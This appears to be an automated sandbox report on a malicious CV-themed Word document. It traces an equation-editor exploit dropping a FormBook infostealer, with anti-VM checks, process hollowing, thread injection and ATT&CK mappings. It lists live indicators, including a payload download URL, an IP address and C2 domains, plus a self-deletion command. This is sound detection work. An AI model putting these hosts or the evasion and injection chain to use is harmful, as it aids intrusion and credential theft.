          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | Stream path '_1696858091/equatIoN naTivE' entropy: 7.99604139076 (max. 8.0)

          Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 4.2.seasonhd72463.exe.25c09b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: seasonhd72463.exe PID: 1812, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1444 | Thread sleep time: -33027s >= -30000s
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1232 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1268 | Thread sleep time: -38000s >= -30000s
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00409AB0 rdtsc
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Thread delayed: delay time: 33027
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Thread delayed: delay time: 922337203685477
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmp | Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.510337596.000000000457A000.00000004.00000001.sdmp | Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idechJ
Source: explorer.exe, 00000006.00000000.438642662.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00409AB0 rdtsc
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_009726F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025226F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0040ACF0 LdrLoadDll,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.lenovoidc.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B50000
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Memory written: C:\Users\user\AppData\Roaming\seasonhd72463.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Queries volume information: C:\Users\user\AppData\Roaming\seasonhd72463.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery321 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion31 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol122 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information41 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

Behavior Graph ID: 510259 | Sample: C.V_Job Request.doc | Startdate: 27/10/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures

• EQNEDT32.EXE 11 (started)
  • DNS/IP: binatonezx.tk 2.56.59.211, 49165, 80 GBTCLOUDUS Netherlands
  • Dropped: C:\Users\user\AppData\...\seasonhd72463.exe, PE32
  • Dropped: C:\Users\user\AppData\...\seasonzx[1].exe, PE32
  • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • seasonhd72463.exe 1 5 (started)
    • Signature: Multi AV Scanner detection for dropped file
    • Signature: Tries to detect virtualization through RDTSC time measurements
    • Signature: Injects a PE file into a foreign processes
    • seasonhd72463.exe (started)
      • Signature: Modifies the context of a thread in another process (thread injection)
      • Signature: Maps a DLL or memory area into another process
      • Signature: Sample uses process hollowing technique
      • Signature: Queues an APC in another process (thread injection)
      • explorer.exe (injected)
        • DNS/IP: www.lenovoidc.com
        • Signature: System process connects to network (likely due to code injection or exploit)
        • msiexec.exe (started)
          • Signature: Modifies the context of a thread in another process (thread injection)
          • Signature: Maps a DLL or memory area into another process
          • cmd.exe (started)
• WINWORD.EXE 291 20 (started)
  • Dropped: ~WRF{4A35DA17-E94D...C-120A276E213C}.tmp, Composite


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
C.V_Job Request.doc | 51% | Virustotal |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe | 23% | ReversingLabs | ByteCode-MSIL.Infostealer.Heye
C:\Users\user\AppData\Roaming\seasonhd72463.exe | 23% | ReversingLabs | ByteCode-MSIL.Infostealer.Heye

          Unpacked PE Files

Source | Detection | Scanner | Label
5.2.seasonhd72463.exe.59d818.2.unpack | 100% | Avira | HEUR/AGEN.1104764
5.0.seasonhd72463.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.seasonhd72463.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.seasonhd72463.exe.380000.0.unpack | 100% | Avira | HEUR/AGEN.1104764
7.0.msiexec.exe.b50000.0.unpack | 100% | Avira | HEUR/AGEN.1104764
5.2.seasonhd72463.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.seasonhd72463.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.msiexec.exe.b50000.0.unpack | 100% | Avira | HEUR/AGEN.1104764

          Domains

Source | Detection | Scanner | Label
binatonezx.tk | 15% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://go.microsoft.c | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://binatonezx.tk/seasonzx.exe | 100% | Avira URL Cloud | malware
www.agentpathleurre.space/s18y/ | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
binatonezx.tk | 2.56.59.211 | true | true | | unknown
www.lenovoidc.com | unknown | unknown | true | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://binatonezx.tk/seasonzx.exe | true | Avira URL Cloud: malware | unknown
www.agentpathleurre.space/s18y/ | true | Avira URL Cloud: safe | low

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmp | false | | high
http://www.collada.org/2005/11/COLLADASchema9Done | seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.msn.com/de-de/?ocid=iehp_2P& | explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msn.com/?ocid=iehp | explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://go.microsoft.c | seasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | false | | high
http://www.msn.com/de-de/?ocid=iehpT2P& | explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp | false | | high
